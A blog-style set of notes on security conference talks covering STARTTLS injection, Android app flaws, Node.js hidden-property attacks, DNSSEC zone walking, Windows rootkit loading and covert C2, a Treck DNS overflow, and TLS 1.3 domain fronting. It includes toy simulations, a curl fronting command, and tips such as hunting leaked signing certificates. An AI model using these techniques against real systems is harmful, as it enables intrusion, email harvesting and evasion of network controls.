- Bug discovered in 2011, but still prevalent in 1.5% of SMTP servers, 2.6% of POP3 servers, 2.4% IMAP.

- We can trigger the same type of bug on the client by sending the client plain text appended to the STARTTLS and the client will think it is part of the TLS session (called Response Injection). Not very severe, but could be used to spoof mailbox content.

- More than half of mail clients tested were vulnerable!

- Other issues too - IMAP server can start session in PREAUTH, meaning no auth is required, and STARTTLS says it cannot be used in authenticated state - so clients may need to disconnect. If attacker also does a mailbox referral to an attacker controlled server, this could send credentials to attacker. Only 1 client (Alpine) was vulnerable to this, because most clients don't support referral.
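The buffering bug is easiest to see in a toy model: if the server keeps whatever plain text arrived in the same read as STARTTLS and processes it after the upgrade, the injected command is treated as if it came through the encrypted session. This is a simulation with no real sockets or TLS. The class and flag names are hypothetical.

```python
class ToyMailServer:
    """Line-based toy server that models only the read buffer around STARTTLS."""

    def __init__(self, flush_on_starttls: bool):
        self.flush_on_starttls = flush_on_starttls
        self.buffer = b""
        self.tls_active = False
        self.processed = []  # (command, treated_as_encrypted)

    def receive(self, data: bytes) -> None:
        self.buffer += data
        while b"\r\n" in self.buffer:
            line, self.buffer = self.buffer.split(b"\r\n", 1)
            self.processed.append((line.decode(), self.tls_active))
            if line.upper() == b"STARTTLS":
                self.tls_active = True
                if self.flush_on_starttls:
                    self.buffer = b""  # the fix: drop anything read before the handshake


# Attacker appends a plain text command to the STARTTLS line in one packet.
injected = b"STARTTLS\r\nMAIL FROM:<attacker@example.invalid>\r\n"

for flush in (False, True):
    server = ToyMailServer(flush_on_starttls=flush)
    server.receive(injected)
    print("flush" if flush else "no flush", server.processed)
```

The client-side Response Injection variant is the mirror image: the client keeps buffered plain text from the server and reads it as part of the TLS session.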

Android Bug Foraging

This is a live session, recording here.

The talk covers several android standard application vulnerabilities, including some interesting ones!

- Process: List exported activities (reachable by other apps) and broadcast receivers, reverse the APK, and test the behavior and actions

- Map out classes that handle specific intents / actions, and see if we can pass data into those that can modify the code execution path.

- Google Camera vulns: Take photo without user action, even if smartphone is locked. Rogue app could invoke those capabilities without the normal camera permissions. POC app called spyxel that mutes volume, takes photos from camera, proximity sensor, GPS history, list/download SD files, auto record calls (fixed by Google).

- Samsung find my mobile vulns: loads the /sdcard/fmm.prop file, which a malicious app can create and use to pass it a malicious URL. There are also broadcast receivers not protected by any permission, which will load the specified file. Several vulns of this nature combined allow user monitoring, erasing data, retrieving call/sms logs, etc.

A Lesson in Privacy Engineering

This is a live talk

This talk covers privacy risks with the Norwegian Covid tracking applications that didn't do a great job protecting user privacy.

- Centralized solutions can lead to abuse - future nefarious use of the saved data, mining the data for other purposes than stated.

- Privacy-first contact tracing could have been used: Alice's phone broadcasts a new message every few minutes -> Bob receives the messages of every person he is near (including Alice) -> Alice gets covid, then uploads her list of messages and timestamps -> Bob can download the list and check his own contact history against it.

- Problems with this implementation: data could be modified before uploading data to central server, required a phone number to use the app.

- An expert group was pulled in to publish an open report on privacy (with full access to source). After 5 days of analysis, the preliminary report showed no deletion or anonymization implemented, scalability issues, permanent device-specific identifiers stored, lack of data validation... plenty of issues found.
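The privacy-first flow described above (Alice broadcasts, Bob records, Alice uploads, Bob checks locally) can be sketched as follows. This is an illustrative toy and not the design of any real app: the `Phone` class, its method names, and the 16-byte random token are all assumptions.

```python
import secrets


class Phone:
    def __init__(self):
        self.sent = []    # (timestamp, token) pairs this phone broadcast
        self.heard = []   # (timestamp, token) pairs received from nearby phones

    def broadcast(self, timestamp: int) -> bytes:
        """Emit a fresh random token so broadcasts cannot be linked together."""
        token = secrets.token_bytes(16)
        self.sent.append((timestamp, token))
        return token

    def receive(self, timestamp: int, token: bytes) -> None:
        self.heard.append((timestamp, token))

    def upload_after_diagnosis(self):
        """Only a diagnosed user publishes, and only their own tokens."""
        return list(self.sent)

    def exposures(self, published):
        """Match the published list against local history, on the device."""
        infected = {token for _, token in published}
        return [(ts, tok) for ts, tok in self.heard if tok in infected]
```

The central server in this sketch only ever sees random tokens from diagnosed users; the matching happens on Bob's phone, so no contact graph is stored centrally.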

Thursday August 6th

Discovering Hidden Properties to Attack the Node js Ecosystem

As a sometimes user of Node.js for a variety of things, I wasn't aware of this specific vulnerability in JS. Feng Xiao clearly shows some interesting attacks.

- Attack vector: De-serialization from querystrings or objects. When a function expects a JSON object and assigns values improperly, attackers can inject key/value pairs to overwrite internal variables, including object prototypes (such as a constructor). Properties are generally considered trusted by developers.

- Code may be vulnerable when using functions like Object.assign to assign all input values to an object or other merging functions.

- This is similar to Mass Assignment risks in Ruby or Object injection in PHP.

- Found 13 0-days in a variety of libraries (SQL injection, ID forging, input validation bypass, etc.). Five of the libraries have more than 1M monthly downloads, including MongoDB & mongoose.

- Nodejs vulnerabilities impact both node web apps, and desktop electron apps.

- Some cool examples of web framework login bypass & SQL injection using this technique.

- Lynx open source tool developed to identify and generate exploits for hidden properties.
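The merge-everything pattern behind these bugs has a close analogue in other languages, in line with the Mass Assignment comparison above. The sketch below is a Python analogue, not Node.js code and not an example from the talk; `Account`, `update_profile_unsafe`, and `update_profile_safe` are hypothetical names. It shows how copying every input key onto an object lets an attacker set a property the developer considered internal.

```python
import json


class Account:
    def __init__(self, username: str):
        self.username = username
        self.is_admin = False   # internal property, never meant to come from input


def update_profile_unsafe(account: Account, body: str) -> None:
    # Copies every key from attacker-controlled JSON onto the object,
    # comparable in spirit to Object.assign(obj, input).
    vars(account).update(json.loads(body))


ALLOWED_FIELDS = {"username"}


def update_profile_safe(account: Account, body: str) -> None:
    # Only explicitly allowed keys are copied; hidden properties are ignored.
    for key, value in json.loads(body).items():
        if key in ALLOWED_FIELDS:
            setattr(account, key, value)
```

An allow-list of accepted keys is one common mitigation; the unsafe variant fails because it trusts that input only contains the documented fields.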

DNSSEC walks

This was a good talk by Hadrien Barral & Rémi Géraud-Stewart. I always like to learn new ways to enumerate DNS entries. Emails are an interesting use case.

- Cloud providers often implement email redirection for clients by including a DNS TXT record, which can be queried to find the 'true' private email of the user. Tools can check DNS records for common emails or emails harvested from sites:



dig TXT ${email} +noall +answer

- DNSSEC offers a chain of trust, which can be inspected using dnsviz. The tool also shows DNS errors, which can be interesting (including defcon.org!)

- Issue with DNSSEC: negative responses, since you can't authenticate for every non-existent subdomain. NSEC can be used to sign records where no domain exists, and this is done by signing intervals for which no domain exists. For example, if there is no domain between apple.example.com and carrot.example.com, then we know that bad.example.com does not exist.

- Using this knowledge, we can enumerate hidden records for zones that use NSEC. Run a query for a random name such as fgfrd.example.com, response: nothing between carrot.example.com and good.example.com. Now we can repeat with gooda.example.com and loop to enumerate. However, NSEC is no longer used...

- NSEC3 created to prevent this issue using hashed values. We can use the same technique to dump all the hashes of real records (giving a count of all records and commonly SHA1 hashes of all valid records).

- hashcat was able to break them (on a single high end GPU) for 88% of 16,000 records. 75% resolved to interesting email redirection, 13% something else.

- Stats: Most web owners used gmail, and about 50% of those users included name in the email. 66% of those did not show their email on the website, and 45% of those emails did not appear in a Google search - so some private emails harvested.

- Fix: Configure NSEC3 with ECDSA signing
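The NSEC walking loop described above can be simulated without touching real DNS. This is a toy sketch: `SimulatedNsecZone` and `walk` are hypothetical names, labels are compared as plain strings rather than in full canonical DNS order, and the probe appends `!` (instead of the `a` used in the example above) so that the guessed name is very unlikely to exist.

```python
import bisect


class SimulatedNsecZone:
    """Toy stand-in for a non-empty NSEC-signed zone; no DNS queries are made."""

    def __init__(self, labels):
        self._labels = sorted(labels)

    def nsec_for(self, label: str):
        """Return the (owner, next) interval proving `label` does not exist.

        The chain is circular: the last name points back to the first.
        """
        i = bisect.bisect_left(self._labels, label)
        if i < len(self._labels) and self._labels[i] == label:
            raise ValueError("name exists; a real server would answer normally")
        owner = self._labels[i - 1]                  # i == 0 wraps to the last label
        nxt = self._labels[i % len(self._labels)]
        return owner, nxt


def walk(zone, start_guess: str):
    """Enumerate every label by repeatedly asking for a name just past the last one."""
    found = []
    _, current = zone.nsec_for(start_guess)
    first = current
    while True:
        found.append(current)
        _, current = zone.nsec_for(current + "!")    # probe right after `current`
        if current == first:                         # chain wrapped around: done
            break
    return found
```

With labels `apple`, `carrot`, `good`, and `zebra`, a first guess of `fgfrd` yields the interval between `carrot` and `good`, matching the example in the notes, and the loop then recovers the remaining names one denial at a time.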

Demystifying Modern Windows Rootkits

I really liked this talk - Bill Demirkapi explains rootkits and windows internals really well. I don't have much background with Windows internals or rootkits, so I learned a lot!

- Kernel drivers have significant privileges, given high trust by anti-virus, and are easier to hide than other forms of malware.

- Loading a rootkit: abuse legitimate drivers - lots of known 'vulnerable' drivers (which require admin privileges): Capcom anti-cheat, Intel NAL. Downside of this method: poor compatibility across OS versions & general instability of the system as a result.

- Loading a rootkit: buy a cert! OK for targeted attacks, but can reveal your identity or have the cert blacklisted.

- Loading a rootkit: abuse a leaked certificate - most of the benefits of a legit one (and can often be found on game hacking forums), but newer certs can't be used on secureboot machines with Win10. (Kernel doesn't usually care if certs are revoked or expired).

- Finding certs - a greyhat warfare s3 search for pfx or p12 extensions found 6k+ certs.

- Rootkit network communications: C2 server, direct port connection, hook into a specific application's communication channel.

- Rather than hooking into a specific application, this technique hooks the entire host network (like Wireshark) and monitors all packets for a malicious magic constant from the C2 server. The C2 server can then send data on any valid port.

- Hooking into the network user space events: create custom device and driver object to hook into File objects. A lot of really interesting windows internal specifics are discussed in the talk.

- Spectre rootkit created to demonstrate this method.
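The magic-constant idea is simple enough to express in a few lines, which is also how a defender might scan a capture for a known marker. This is only a user-space illustration with assumed names: `MAGIC` is a made-up value (not the constant used by the Spectre rootkit), and the real implementation lives in a kernel driver rather than in Python.

```python
MAGIC = b"\xde\xad\xbe\xef\x13\x37"   # hypothetical marker, not the value from the talk


def extract_command(payload: bytes, magic: bytes = MAGIC):
    """Return the bytes following the magic marker, or None for ordinary traffic."""
    index = payload.find(magic)
    if index == -1:
        return None
    return payload[index + len(magic):]


def filter_packets(payloads):
    """Yield hidden commands from a stream of packet payloads, whatever the port."""
    for payload in payloads:
        command = extract_command(payload)
        if command is not None:
            yield command
```

Because the match is on payload content rather than on a port or process, the marker can ride on any service the host already exposes.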

Hacking the Supply Chain

This video is specifically about maximizing vulnerability value by focusing research efforts on lesser known components that are generic and supplied to many end products. In this case, Treck TCP/IP stack, which is used in hundreds of millions of embedded devices.

- Due to the nature of the end products (IoT, embedded devices, medical devices), vulnerabilities are unlikely to be patched. End users won't have good visibility into the vulnerability source (Treck), and some products with the vulnerability are no longer supported.

- A total of 19 vulnerabilities found in Treck, including 4 RCE.

- The attack discussed is based on the DNS resolver, so it can traverse NAT boundaries.

- Treck DNS resolver has a function that calculates size, then allocates a buffer. However, the size function misses a few critical checks: it does not validate the characters in domain names, and it does not enforce the RFC limit of 255 characters on a domain name. It uses an unsigned short int while calculating a given record length (max 64k). I know where this is headed now :)

- Max DNS packet size is 1460 bytes, but can use embedded compression to increase that beyond the integer max (72k).

- This can be used for RCE on all DNS query types by including the specially crafted name in a CNAME record.

- Device they tested (a UPS) has no ASLR or DEP, highly similar to x86 architecture.
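The arithmetic behind the length bug can be shown with a small model. This is not Treck's code: the function names are hypothetical, and the sketch only illustrates how a 16-bit counter wraps when the expanded name is longer than 65535 bytes, so the buffer allocated from it is far smaller than the data later copied.

```python
U16_MASK = 0xFFFF
MAX_NAME_LENGTH = 255   # domain name limit referred to in the notes


def name_length_true(label_lengths):
    """Real encoded size: each label costs its length plus one length byte."""
    return sum(n + 1 for n in label_lengths)


def name_length_u16(label_lengths):
    """Same sum, but accumulated in a wrapping unsigned 16-bit counter."""
    total = 0
    for n in label_lengths:
        total = (total + n + 1) & U16_MASK
    return total


def is_valid_name(label_lengths) -> bool:
    """The missing check: reject names longer than the RFC limit."""
    return name_length_true(label_lengths) <= MAX_NAME_LENGTH
```

For 1100 labels of 63 bytes each, the true size is 70400 bytes while the wrapped counter holds 4864, so a copy into a buffer sized from the counter would overrun it by 65536 bytes.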

Long live Domain Fronting (on TLS 1.3)

Privacy is one of my core concerns, so I am always interested in ways to enhance it. This talk discusses how to use Domain Fronting with TLS 1.3 to bypass network controls and censorship, now that the older technique has been mostly shut down.

The demo by Erik Hunstad is impressive, with interesting tools that demonstrate a setup that bypasses network filters and censorship.

- Domain fronting: Avoid network defenses or censorship by connecting to an innocuous domain while hiding the true destination (that may be banned or suspicious). Big restriction: fronted domain and fronting domain must be on the same service (CDN usually)

- Domain fronting primer: request to HostA with Host header pointing to HostB:

curl -s -H "Host: hidden.domain.com" -H "Connection: close" "https://fronteddomain.com/resource_on_hidden.domain.com"

- This worked great until 2018, when the Russian government pressured cloud providers to block it in order to stop use of the Telegram messenger app. AWS, Google and CloudFlare stopped it. Azure still allows it at the moment.

- TLS 1.3 method: TLS 1.3 connection with ESNI sent to any cloudflare server. HTTP request is sent using that connection with any host header. SNI can be included as well, doesn't have to match ESNI. Cloudflare will forward to the true destination, as long as it has DNS Provided by CloudFlare.

TLS 1.3

GET / HTTP/1.1

Host: hackthis.computer

-----------------------------> Any cloudflare IP ---> hackthis.computer

ESNI: hackthis.computer

SNI: can-be-anything.com

- Noctilucent project: a Go crypto/tls rewrite which demonstrates domain hiding, with plenty of options.

- Currently 21% of top 100k sites available for this on cloudflare.

- Most traffic filtering is done on the SNI field, which this technique easily defeats.

- What about HTTPS decrypting firewalls with root certs? Test firewall with TLS 1.3 decryption, setup with no exemptions. However, some exemptions are built in due to things like cert pinning on major sites - fronting with mozilla.org bypasses firewall, but does show up in logs.

- What if it's setup with websockets? Creates only a single connection but also bypasses firewall controls (using Cloak project to leverage websocket tunneling)

- Blue team defenses: block or flag ClientHello packets that contain both server_name and encrypted_server_name, or see if there are strange traffic patterns to specific sites.
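The blue team check on ClientHello extensions can be sketched as a small parser. Assumptions are flagged in the code: the input is the raw extensions block of a ClientHello (without its 2-byte total length prefix), `0xFFCE` is the code point used by draft versions of ESNI and may differ in other deployments, and the function names are hypothetical.

```python
import struct

EXT_SERVER_NAME = 0x0000            # server_name (SNI)
EXT_ENCRYPTED_SERVER_NAME = 0xFFCE  # assumption: code point from draft ESNI versions


def extension_types(extensions_block: bytes):
    """List the extension type IDs in a TLS extensions block.

    Each extension is encoded as type (2 bytes), length (2 bytes), data.
    """
    types = []
    offset = 0
    while offset + 4 <= len(extensions_block):
        ext_type, ext_len = struct.unpack_from("!HH", extensions_block, offset)
        offset += 4
        if offset + ext_len > len(extensions_block):
            raise ValueError("truncated extension")
        types.append(ext_type)
        offset += ext_len
    if offset != len(extensions_block):
        raise ValueError("trailing bytes after last extension")
    return types


def looks_like_domain_hiding(extensions_block: bytes) -> bool:
    """Flag a ClientHello that carries both a plaintext SNI and an encrypted one."""
    types = set(extension_types(extensions_block))
    return EXT_SERVER_NAME in types and EXT_ENCRYPTED_SERVER_NAME in types
```

A hit is only a signal worth flagging for review, since the notes also suggest looking at traffic patterns to specific sites.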